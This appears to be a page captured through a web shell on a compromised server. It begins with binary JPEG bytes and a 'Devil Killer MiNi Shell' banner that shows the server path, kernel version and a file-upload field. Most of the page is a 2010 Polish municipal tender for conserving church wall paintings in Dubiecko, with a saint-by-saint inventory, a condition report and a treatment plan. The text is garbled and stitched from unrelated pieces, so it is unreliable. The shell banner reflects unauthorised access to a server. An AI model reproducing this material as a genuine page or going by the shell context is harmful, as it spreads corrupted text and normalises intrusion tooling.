JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100526/145518-N-2010.html

<p class="kh_header"><b>Dubiecko: Przedmiotem zamówienia są prace konserwatorskie polichromii prezbiterium, nawy głównej i naw bocznych w Kościele Parafialnym pod wezwaniem Niepokalanego Serca NMP w Dubiecku wraz z rusztowaniem niezbędnym do wykonania prac konserwatorskich</b><br>
<b>Numer ogłoszenia: 145518 - 2010; data zamieszczenia: 26.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Dubiecko , ul. Przemyska 10, 37-750 Dubiecko, woj. podkarpackie, tel. 016 6511156, faks 016 6511156.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dubiecko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są prace konserwatorskie polichromii prezbiterium, nawy głównej i naw bocznych w Kościele Parafialnym pod wezwaniem Niepokalanego Serca NMP w Dubiecku wraz z rusztowaniem niezbędnym do wykonania prac konserwatorskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ogólny opis projektu i szczegółowy opis 
przedmiotu zamówienia 
 

PROGRAM  PRAC  KONSERWATORSKICH  DOTYCZĄCY POLICHROMII  KOŚCIOŁA P.W. NIEPOKALANEGO SERCA NAJŚWIĘTSZEJ MARII PANNY W DUBIECKU


OPIS INWENTARYZACYJNO-IKONOGRAFICZNY POLICHROMII

Kościół p.w. Niepokalanego Serca Najświętszej Marii Panny w Dubiecku posiada prezbiterium zamknięte półkoliście absydą z podziałami pilastrowymi, nawę krzyżową, nawę główną  pięcioprzęsłową, zakończoną chórem muzycznym. Przęsła dzielone są za pomocą zdwojonych gurtów przechodzących na ścianach w pilastry. Sklepienie od ścian oddzielone gzymsem, okrągłe okna. Ściany nawy głównej z czterema otworami po każdej stronie.  Dwie nawy boczne również z pięcioma przęsłami oraz dwie kaplice boczne otwarte na nawę za pomocą trzech otworów półkoliście zamkniętych (środkowy większy, dwa mniejsze) Nawa główna posiada sklepienie kolebkowe z lunetami. Wejście do nawy gł. poprzedza przedsionek.                                    
Całość polichromowana w technice kazeinowej przez Stanisława Jakubczyka z Krakowa.

PREZBITERIUM

Prezbiterium o wymiarach: wys.: 18,47m; szer.: 10,24m; dł.: 11,60m
Na ścianie północnej i południowej przedstawienie figuralne świętych opatrzone podpisami na zgeometryzowanym tle. Całość tła ścian prezbiterium jasno-zielona. Na przeciwległych ścianach pas dekoracyjny podzielony na dziewięć prostokątnych pól, w których widnieją figury świętych z podpisami.   Na ścianie północnej idąc od góry w pierwszym rzędzie prorok Izajasz w postaci stojącej, z lewą ręką uniesioną do góry w prawej trzymający zwój pergaminu z napisem OTO PANNA POCZNIE I PORODZI SYNA. Szata proroka spodnia i wierzchnia niebiesko -fioletowo- brązowa zbudowana ze zgeometryzowanych brył. Widoczna długa broda również zgeometryzowana w kolorach żółto- brązowo- fioletowo- niebieskim. Na głowie proroka fioletowo- niebieski turban. Stopy bose postaci. Tło zbudowane z pofalowanych pasów w pastelowych kolorach: jasno- niebieskim; różowym; żółtym i fioletowym. U dołu postaci na tle jasno- fioletowym napis- PROROK  IZAJASZ.                                                  
Obok w rzędzie Święta Anna w postaci stojącej zwróconej w lewą stronę do postaci Świętego Joachima. Święta trzyma w dłoniach wianek z białych stokrotek. Ubrana w zgeometryzowaną szatę spodnią i wierzchnią w kolorach jasno- niebieskim, jasno- zielonym, żółtym, jasno- różowym. Na głowie świętej chusta. Wokół głowy jasno- różowa aureola. Widoczne bose stopy zwrócone tak jak cała postać w lewo. Tło postaci zbudowane z pofalowanych pasów w kolorach niebieskim, brązowym, ugrowym, fioletowym, popielatym,, żółtym. U dołu postaci napis na tle brązowym; ŚWIĘTA ANNA.  
Tuż obok w rzędzie Święty Joachim w postaci stojącej zwróconej w prawo do Św. Anny. Święty trzyma w lewej ugiętej ręce bukiet stokrotek a prawą podaje jeden kwiat Św. Annie. Szata proroka spodnia i wierzchnia zbudowana ze zgeometryzowanych brył w kolorze ciemno- zielonych, fioletowym, brązowym i niebieskim. Głowa z odsłoniętą czaszką z tylnim zarostem i krótką ciemną brodą. Wokół głowy jasno- różowy nimb. Tło postaci zbudowane z falistych pasów w kolorach jasno-niebieskim, różowym, żółtym, ciemno-niebieskim. U dołu na różowym tle napis: ŚW. JOACHIM.                                                    
W drugim rzędzie pierwsza postać stanowi Święty Józef, zwrócony w lewo, trzymający w prawej ręce topór, którym się podpiera. Lewą rękę podnosi do pochylonego czoła. U stóp widoczny biały gołąbek z zielonymi  skrzydłami. Święty ubrany jest w krótką (za kolana) zgeometryzowaną szatę w kolorach jasno-niebieskim, jasno- różowym, żółtym i jasno-zielonym. Widoczne długie, ciemne włosy; krótka broda z wąsami. Wokół głowy jasno- różowy nimb. Tło postaci zbudowane z falistych pasów w kolorach ugrowym, niebieskim (ultramaryna) fioletowym. U dołu na fioletowym tle napis: ŚWIĘTY JÓZEF. 
Obok w rzędzie postać świętego Jana Ewangelisty zwrócona w prawo do postaci Św. Józefa. Św. Jan ma prawą rękę uniesioną do góry a w lewej trzyma otwartą księgę pisma świętego z napisem: MATKO OTO SYN TWÓJ (na jednej stronie) SYNU OTO MATKA TWOJA (na drugiej stronie). Szata spodnia i wierzchnia zgeometryzowana w kolorach: jasno-niebieskim, ciemno-niebieskim, brązowym, szarym. Twarz młodzieńcza z ciemnymi włosami i wysokim czołem. Nimb jasno- różowy. Pod spodem na ugrowym tle napis: ŚWIĘTY JAN  EWANGELISTA.                                                                          Obok w rzędzie postać Św. Łukasza przedstawiona frontem do widza. Święty trzyma obraz Matki Boskiej Częstochowskiej i paletę malarską z pędzlami co wskazuje symbolicznie na opiekę Św. Łukasza nad artystami, u dołu kielich z wężem symbolizujący stan lekarzy, którymi również opiekuje się Św. Łukasz. Święty w zgeometryzowanej szacie wierzchniej i spodniej w kolorach: jasno-niebieskim, jasno-zielonym, jasno- różowym i żółtym. Twarz starszego człowieka pochylona, z długą siwą brodą i wąsami, z włosami wokół odkrytej czaszki. Tło w faliste pasy w kolorach: ugrowym, niebieskim, fioletowym, popielatym, brązowym. U dołu na zielono- szarym tle napis: ŚWIĘTY ŁUKASZ.
W trzecim rzędzie pierwszą postacią jest Święty Efrem. Postać młodzieńca zwrócona do ołtarza, trzyma w prawej ręce lutnię a w lewej pismo święte. Szata wierzchnia i spodnia zgeometryzowana w kolorach: ciemno-niebieskim, fioletowym, brązowym, popielatym. Ciemne, krótkie włosy z grzywką. Biały nimb. Tło w faliste pasy w kolorach: jasno-fioletowym, jasno-niebieskim, różowym, żółtym. U dołu na jasno-niebieskim tle napis: SWIĘTY EFREM.        
Obok w rzędzie postać Św. Bernarda z Clairvaux zwrócona frontem do widza w szacie spodniej oraz wierzchniej z kapturem(zakonnika) w kolorach: jasno-zielonym, popielatym, żółtym, różowym. Święty z rękami uniesionymi do góry, w geście pochwalnym. Wokół głowy jasno- różowy nimb. Na nogach szare sandały. U dołu na niebieskim tle napis: ŚW. BERNARD Z CL.                               
Ostatnim w rzędzie jest Św. Jan Damasceński przedstawiony w postaci stojącej zwróconej w kierunku ołtarza, trzymającej lewą ręką, odciętą swoją prawicę (jak głosi legenda miał utracić rękę w czasie sporu ikonoklastycznego, którą Matka Boża ponownie mu przyszyła. U dołu po lewej stronie ułożone trzy księgi. Szata spodnia z krótkimi rękawkami a wierzchnia udrapowana na lewym ramieniu. Kolorystyka zgeometryzowanej szaty: brąz, błękit, dwa odcienie popielatego koloru. Głowa otoczona ciemnymi, krótkimi lokami. Wokół biały nimb. Na nogach szare sandały. Tło identyczne jak u Św. Efrema. U dołu na jasno-fioletowym tle napis: ŚW. JAN DAMASC.                                                      
Poniżej podziałów z postaciami świętych znajduje się prostokątne wejście do zakrystii otoczone półkolistym portalem w jasno-niebieskim kolorze z ciemno-niebieskim terakotowym uskokiem.                                                                     
Na przeciwległej ścianie południowej przedstawiony również pas dekoracyjny z podziałem na dziewięć prostokątnych pól, w których widnieją figury świętych z podpisami.                                                                                                            
Idąc od góry w pierwszym rzędzie postać Św. Wojciecha, zwrócona do widza, trzymająca w prawej ręce zwój z napisem: BOGU RODZICA DZIEWICA- pierwszym polskim hymnem religijnym a w lewej włócznię. Postać Świętego w stroju nawiązującym do epoki, w której działał- średniowiecza. Szata spodnia dłuższa, wierzchnia krótsza z szerokimi rękawami. Na przodzie stuła z krzyżykami, koloryt szaty ciemny. Głowa otoczona prostymi piastowskimi włosami, krótka broda i wąsy. Wokół głowy biały nimb. Na nogach skórzane szare ciżemki, ciemne rajstopy. Tło jasne, w faliste pasy: żółte, niebieskie, jasno-fioletowe i różowe. U dołu na ugrowym tle napis: ŚW. WOJCIECH.            
Obok w rzędzie postać Św. Dominika zwrócona w stronę ołtarza z głową pochyloną w kierunku trzymanego w obu rękach różańca. Szata zakonna jasna z przewagą bieli, jasnego błękitu i jasnej zieleni. Włosy od tyłu okrywające czaszkę, nimb jasno- różowy. Tło ciemne w faliste pasy: ugrowe, niebieskie, fioletowe, brązowe. Stopy w brązowych sandałach. Pod spodem, na niebieskim tle napis: ŚW. DOMINIK.                                                                                
Następna w rzędzie jest postać Św. Jacka zwrócona w prawo z głową skierowaną na figurkę Matki Bożej z dzieciątkiem, którą Święty trzyma w prawej ręce, natomiast w lewej ręce ma przykryty kielich. Szata zakonna spodnia jasna z przewaga bieli, wierzchnia ciemna o kilku gradacjach ciemnego popielu. Głowę otaczają ciemne włosy z grzywką odsłaniające środkiem czaski biały nimb. Stopy w brązowych sandałach. Tło tożsame z tłem  Św. Wojciecha. Dołem na niebieskim tle napis: ŚWIETY JACEK.                                                             
W środkowym rzędzie pierwszą postacią jest Św. Kazimierz w stroju królewskim trzymający na obu dłoniach białą lilię symbol niewinności. Święty w krótkiej spodniej zielonej szacie z długimi zwężającymi się rękawami, spiętą w pasie szerokim pasem z klamrą z orłem, peleryną długa spiętą klamrą. W jasnych rajstopach, ze skórzanymi trzewikami na stopach. Młodzieńcza twarz, długie jasne włosy, złota korona na głowie. Wokół niej jasno- różowy nimb. Tło w falujące pasy w kolorze fioletu, brązu, ugru, błękitu i popielu. Dołem na błękitnym tle napis ŚW. KAZIMIERZ.                                                                  
Obok w rzędzie postać Św. Jana Kantego, w stroju kanonika trzymającego w dłoniach rozbity wazon. Ciemne szaty spodnie, wierzchnia z szerokimi rękawami, z białym kołnierzem, ze złotym krzyżem zawieszonym na łańcuchu na szyi. Na głowie Świętego ciemno-popielaty biret kanonika. Włosy ciemne, długie, krótka broda i wąsy. Wokół głowy biały nimb. Tło jasne pastelowe w falujące pasy. U dołu na fioletowym tle napis: ŚW. JAN KANTY.                         
Obok w rzędzie postać Św. Stanisława Kostki zwrócona w prawo do wiernych, z dłońmi złożonymi w geście modlitewnym, u stóp z sakwą i laską. Młodzieńcza postać w krótkiej różowej spodniej szacie i wierzchnim ugrowym płaszczu związanym pod szyją, w zielonych rajstopach i jasnych trzewikach. Głowa z ciemnymi krótkimi włosami, okolona różowym nimbem. Tło ciemne, tożsame z tłem Św. Kazimierza. U dołu na popielatym tle napis: ŚW. ST. KOSTKA.                
W dolnym rzędzie pierwszą postacią jest Św. Alfons Liguori w stroju biskupa, w ciemnych szatach, przepasany szerokim, ciemnym pasem, z białą stójką, z charakterystycznie zawieszonym złotym krzyżem na szyi. W lewej ręce święty trzyma księgę Pisma Św. Prawa opuszczona jest do dołu. Z prawej strony u dołu leży biskupia mitra obszyta krzyżykami. Głowę z wysokim czołem okalają krótkie szpakowate włosy, z brodą i wąsami. Tło jasne, z falującymi pasami.    U dołu na jasno-fioletowym tle napis: ŚW. ALFONS LIG.                                 
Obok w rzędzie postać Św. Bernadetty zwrócona w lewo do ołtarza. Młoda dziewczęca postać ubrana w suknię ze szmaragdowym serdakiem i długą spódnicą, na głowie z jasnym długim welonem. Święta lewą rękę trzyma na sercu a prawą podtrzymuje welon. Włosy uczesane w koronkę. Na nogach proste, skórzane, sznurowane buty. Tło ciemne z falującymi pasami. U dołu na fioletowym tle napis: ŚW. BERNADETTA.                                                                            
Obok ostatni w rzędzie przedstawiony jest Św. Jan Bosco, w szacie księdza z widoczną białą koloratką i ciemną stułą przewiązaną w pasie. Święty stoi obok młodego drzewa z zielonymi listkami podpartego palikiem. Dłońmi wykonuje gest pielęgnacji drzewa- symbolu nowego życia. Włosy ciemne, krótkie, wokół biały nimb. Tło tożsame z tłem Św. Alfonsa. U dołu na różowym tle napis: ŚW. JAN BOSCO. Analogicznie jak na ścianie przeciwnej na dole ściany znajduje się prostokątne wejście do zakrystii otoczone półkolistym portalem w jasno-fioletowym kolorze z niebieskim terakotowym uskokiem. Ścianę północną i południową wieńczą okrągłe okna. Sklepienie żaglowe w jasnym kolorycie z geometrycznymi podziałami z napisami: M  MATKO  CHRYSTUSOWA M M   ŚWIĘTA PANNO NAD PANNAMI, M  MATKO ŁASKI BOŻEJ, M M M M   ŚWIĘTA MARYJO M M M M   z symbolami: żłobek z gwiazdką, wianek, oko opatrzności z dłońmi i promieniami, litera W z krzyżykiem.  Absyda oddzielona jest od ściany południowej i północnej pilastrem w kolorze błękitnym biegnącym na całości ścian i sklepienia. Od niego rozchodzą się ostro zakończone cztery pilastry przeplatane długimi, wąskimi oknami, półokrągło zwieńczonymi z podziałami w geometryczne wzory zielono- błękitno- brązowe. W środku u góry na ścianie wschodniej okrągłe okno z podziałami geometrycznymi. Sklepienie pomiędzy pilastrami posiada geometryczne podziały niebiesko- zielone, na których namalowane są złote winogrona z liśćmi i trzy symbole                                                                                                    
Wnęki okien posiadają złoto- zielone podziały ze złotymi symbolami. Pomiędzy pilastrami w absydzie na zielonkawym tle srebrne rysunki symboli ofiary.

NAWA GŁÓWNA

Nawa główna o wymiarach: wys.: 19,60m; szer.: 10m; dł.: 32m
Polichromia całości utrzymana w tonacji zielonej z seledynowym tłem, z ciemniejszymi pilastrami. Sklepienie z geometrycznymi podziałami w kolorach: żółtym, niebieskim, zielonym, fioletowym. Napisy na sklepieniu prezbiterium, nawy głównej wzięte są z litanii do matki Boskiej. Natomiast w transepcie jest napis: DUCHU ŚW, BOŻE, ŚWIĘTA TRÓJCO JEDYNY BOŻE, SYNU ODKUPICIELA ŚWIATA BOŻE, OJCZE Z NIEBA BOŻE                                     
W nawie głównej nad przejściami do naw bocznych sceny malowane linearnie srebrnym kolorem. Po prawej stronie bliżej ołtarza scena podpisana SOBÓR W EFEZIE R 431. Wokół stołu ze zwojem, z napisem THEOTOKOS zgromadzeni są uczestnicy soboru w strojach liturgicznych. 
Scena druga: Matka Boska z dzieciątkiem podaje różaniec klęczącemu Św. Dominikowi napis: DAJ MI MOC PRZECIWKO NIEPRZYJACIOŁOM TWOIM XIII                                                                                                      
Scena trzecia: Św. Franciszek odbudowuje kościół Św. Porciunkuli napis: PORCIUNKULA XIII                                                                                 
Scena czwarta: obrona Jasnej Góry w 1655r. Ksiądz Kordecki idzie po murach obronnych klasztoru, z których widoczni są walczący żołnierze, u góry napis: POD TWOJA OBRONĘ UCIEKAMY SIĘ dołem: JASNA GÓRA 1655                  
Po stronie lewej idąc od chóru scena piąta: Śluby Jana Kazimierza we Lwowie w 1656r. Klęczący król Jan Kazimierz ślubuje u stóp ołtarza w obecności duchowieństwa i szlachty. U góry napis: LWÓW na środku napis:1656 CIEBIE DZIŚ ZA OPIEKUNKĘ MOJĄ I ZA KRÓLOWĘ KRÓLESTWA MEGO OBIERAM. 
Scena szósta: ukazanie się Matki Boskiej pastuszkowi w La Salet w 1846r. Na tle pejzażu górskiego Matka Boska Saletiańska ukazuje się dwóm młodym pastuszkom, u góry napis: JESTEM TU DLATEGO BY WAM ZWIASTOWAĆ NOWINĘ, dołem napis LA SALETTE 1846                                         
Scena siódma: Matka Boska Niepokalanego Poczęcia ukazuje się klęczącej Bernadecie w grocie w Lourdes w 1858r. u góry napis JAM JEST NIEPOKALANE POCZĘCIE u dołu: LOURES 1858r.                                   
Scena ósma: Matka Boska Fatimska ukazuje się rodzeństwu pastuszków w Fatimie u góry napis: POKUTY, POKUTY, POKUTY FATIMA 1917.  
                                    
NAWY BOCZNE

Wymiary: wys.: 11,50m; szer.:5,27m; dł.:32m.
Polichromia utrzymana w tonacji jasno- zielonej. Sklepienie krzyżowe z gurtami, kolorystyka tęczy, formy faliste. Gurty przechodzą w pilastry na ścianach. Mają kolor brązowo- czerwony z pasowymi podziałami i z ornamentami w formie krzyżyków obwiedzionych falista linią. Na pilastrach umieszczono białe stacje w technice ceramiki angobowanej.

STAN ZACHOWANIA

Polichromia kościoła p.w. Niepokalanego Serca Najświętszej Marii Panny po upływie 50-ciu lat nieustannego użytkowania wymaga przeprowadzenia zabiegów konserwatorskich.                                                                                  
Całość polichromii zabrudzona, zakurzona.                                              
Warstwa malarska miejscami spudrowana. Na ścianie północnej prezbiterium ubytki polichromii wraz z pobiałą wynikające z zawilgocenia. Na ścianie wschodniej prezbiterium zniszczenia spowodowane przez odchody ptasie (zabrudzenia) Zaprawa spękana na sklepieniu.

PROGRAM PRAC KONSERWATORSKICH POLICHROMII KOŚCIOŁA P.W. NIEPOKALANEGO SERCA NAJŚWIĘTSZEJ MARII PANNY
I.	WNIOSKI I ZAŁOŻENIA KONSERWATORSKIE
1.	Celem zabiegów konserwatorskich jest przywrócenie wnętrzu kościoła jego pierwotnych walorów artystycznych i estetycznych. Z tego względu konieczna jest konserwacja XX w. polichromii. Mają temu służyć:
a)	Dokumentacja opisowa i fotograficzna stanu zachowania polichromii przed konserwacją
b)	Przeprowadzenie badań chemicznych spoiwa
c)	Konserwacja zaprawy : wzmocnienie przyczepności i uzupełnienie ubytków zaprawy
d)	Konserwacja w. malarskiej : oczyszczenie zabrudzeń, likwidacja spudrowań i złuszczeń, wzmocnienie przyczepności farby do podłoża. Rekonstrukcja kolorystyczna tła oraz napisów
PROPONOWANE POSTEPOWANIE KONSERWATORSKIE
1.	Dokumentacja opisowa i fotograficzna przed konserwacją
2.	Wykonanie badań chemicznych spoiwa, które pozwolą na zastosowanie odpowiednich środków w konserwacji
3.	Odczyszczenie kurzu, pajęczyn pędzelkami, zeskrobanie odchodów ptasich
4.	Odczyszczenie zabrudzeń chemicznie: wykonanie prób: środki powierzchniowo czynne, amoniak, zasada sodowa
5.	Utrwalenie pudrującej się polichromii przez rozpylenie 6% Paraloidu B-72 w metanolu
6.	Uzupełnienie ubytków pobiały
7.	Zlikwidowanie pęknięć na sklepieniu przy pomocy masy uszczelniającej na bazie dyspersji akrylowej
8.	Uzupełnienie ubytków zaprawy wapienno- piaskowej
9.	Punktowanie scalające w przypadku postaci przy pomocy pigmentów włoskich i spoiwa kazeinowego (kazeina wapienna)
10.	Rekonstrukcja kolorystyczna tła i napisów w technice kazeiny wapiennej
11.	Utrwalenie polichromii 6% Paraloidem B-72 w metanolu
12.	Przymocowanie eko -pików w miejscach gdzie najczęściej siedzą ptaki.
13.	Opracowanie dokumentacji konserwatorskiej, opisowej i fotograficznej.

Przedmiar robót:
POLICHROMIA KOŚCIOŁA W DUBIECKU

Prezbiterium:
1.	Polichromia ornamentalna ścian 		280,00 m2
2.	Polichromia figuralna ścian 			  40,00 m2
3.	Polichromia monochromatyczna ścian	140,00 m2
4.	polichromia ornamentalna sklepienia 	110,00 m2
razem 			570,00 m2

Nawa główna:
5.	Polichromia ornamentalna ścian 		  80,00 m2
6.	Polichromia monochromatyczna ścian	600,00 m2
7.	polichromia ornamentalna sklepienia	275,00 m2
razem			955,00 m2

Dwie nawy boczne:
8.	Polichromia ornamentalna ścian 		150,00 m2
9.	Polichromia monochromatyczna ścian	868,00 m2
10.	polichromia ornamentalna sklepienia	308,00 m2
11.	14 stacji płaskorzeźbionych			  12,00 m2
Razem		           1338,00 m2


12.	Dokumentacja powykonawcza.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 45.26.27.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>musi sełniać</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>musi spełniać</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>musi spełniać</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>musi spełniać</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>musi spełniać</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wg Specyfikacji Istotnych warunków zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


